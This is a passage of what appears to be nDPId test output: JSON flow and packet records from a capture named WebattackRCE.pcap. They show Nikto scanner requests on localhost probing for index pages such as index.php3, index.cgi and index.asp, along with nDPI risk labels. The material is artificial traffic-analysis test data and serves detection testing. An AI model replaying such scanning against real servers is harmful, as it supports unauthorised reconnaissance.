Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_packet_id":1,"flow_last_seen":1576420276804,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276804,"pkt":"AAAAAAAAAAAAAAAACABFAADHUClAAEAG7AV\/AAABfwAAAcI8H5AXCWgXkPGhe4AYAED+uwAAAQEICp1m+2ydZvtsR0VUIC9pbmRleC5waHAzIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":91,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276804,"flow_last_seen":1576420276804,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276804,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49724,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php3","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_packet_id":1,"flow_last_seen":1576420276806,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276806,"pkt":"AAAAAAAAAAAAAAAACABFAADHuG9AAEAGg79\/AAABfwAAAcI+H5DOCYBdLPnSzYAYAED+uwAAAQEICp1m+26dZvtuR0VUIC9pbmRleC5waHA0IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":92,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276806,"flow_last_seen":1576420276806,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276806,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49726,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php4","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_packet_id":1,"flow_last_seen":1576420276807,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276807,"pkt":"AAAAAAAAAAAAAAAACABFAADHnVlAAEAGntV\/AAABfwAAAcJAH5BrmKVmTh6XdYAYAED+uwAAAQEICp1m+2+dZvtvR0VUIC9pbmRleC5waHA1IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":93,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276807,"flow_last_seen":1576420276807,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276807,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49728,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php5","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_packet_id":1,"flow_last_seen":1576420276809,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276809,"pkt":"AAAAAAAAAAAAAAAACABFAADHz9VAAEAGbFl\/AAABfwAAAcJCH5Dtpvfi4owoVYAYAED+uwAAAQEICp1m+3GdZvtwR0VUIC9pbmRleC5waHA3IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":94,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276809,"flow_last_seen":1576420276809,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276809,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49730,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php7","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_packet_id":1,"flow_last_seen":1576420276810,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":213,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":213,"pkt_l4_len":179,"thread_ts_msec":1576420276810,"pkt":"AAAAAAAAAAAAAAAACABFAADH5lRAAEAGVdp\/AAABfwAAAcJEH5B9+95hKQN6FIAYAED+uwAAAQEICp1m+3KdZvtyR0VUIC9pbmRleC5odG1sIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCg0K"} +01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":95,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":95,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276810,"flow_last_seen":1576420276810,"flow_idle_time":7560000,"flow_min_l4_payload_len":147,"flow_max_l4_payload_len":147,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":147,"midstream":1,"thread_ts_msec":1576420276810,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49732,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.html","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_packet_id":1,"flow_last_seen":1576420276812,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276812,"pkt":"AAAAAAAAAAAAAAAACABFAADGlhlAAEAGphZ\/AAABfwAAAcJGH5DYta4lttm384AYAED+ugAAAQEICp1m+3OdZvtzR0VUIC9pbmRleC5odG0gSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KDQo="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":96,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276812,"flow_last_seen":1576420276812,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276812,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49734,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.htm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1576420276813,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420276813,"pkt":"AAAAAAAAAAAAAAAACABFAADI2h9AAEAGYg5\/AAABfwAAAcJIH5At6uIveFvtbIAYAED+vAAAAQEICp1m+3WdZvt1R0VUIC9pbmRleC5zaHRtbCBIVFRQLzEuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} 
+01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":97,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276813,"flow_last_seen":1576420276813,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420276813,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49736,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.shtml","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00671{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1576420276815,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276815,"pkt":"AAAAAAAAAAAAAAAACABFAADGtzZAAEAGhPl\/AAABfwAAAcJKH5BukY8IX6sJe4AYAED+ugAAAQEICp1m+3edZvt2R0VUIC9pbmRleC5jZm0gSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":98,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276815,"flow_last_seen":1576420276815,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276815,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cfm","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} 
+00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00672{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1576420276817,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276817,"pkt":"AAAAAAAAAAAAAAAACABFAADGzfJAAEAGbj1\/AAABfwAAAcJMH5CEyfXFi\/ZWqoAYAED+ugAAAQEICp1m+3mdZvt5R0VUIC9pbmRleC5jZ2kgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0Om11bHRpcGxlX2luZGV4KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} +01061{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":99,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276817,"flow_last_seen":1576420276817,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276817,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric 
IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.cgi","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1576420276819,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420276819,"pkt":"AAAAAAAAAAAAAAAACABFAADFj3JAAEAGrL5\/AAABfwAAAcJOH5DAfLdF0MycV4AYAED+uQAAAQEICp1m+3udZvt7R0VUIC9pbmRleC5wbCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6bXVsdGlwbGVfaW5kZXgpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} 
+01062{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":100,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276819,"flow_last_seen":1576420276819,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420276819,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.pl","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:multiple_index)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00673{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":1,"flow_last_seen":1576420276820,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":212,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":212,"pkt_l4_len":178,"thread_ts_msec":1576420276820,"pkt":"AAAAAAAAAAAAAAAACABFAADG77xAAEAGTHN\/AAABfwAAAcJQH5DIa9eQqgE4nYAYAED+ugAAAQEICp1m+3ydZvt8R0VUIC9pbmRleC5hc3AgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDptdWx0aXBsZV9pbmRleCkNCkhvc3Q6IDEyNy4wLjAuMQ0KDQo="} +01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":101,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420276820,"flow_last_seen":1576420276820,"flow_idle_time":7560000,"flow_min_l4_payload_len":146,"flow_max_l4_payload_len":146,"flow_tot_l4_payload_len":146,"flow_avg_l4_payload_len":146,"midstream":1,"thread_ts_msec":1576420276820,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard 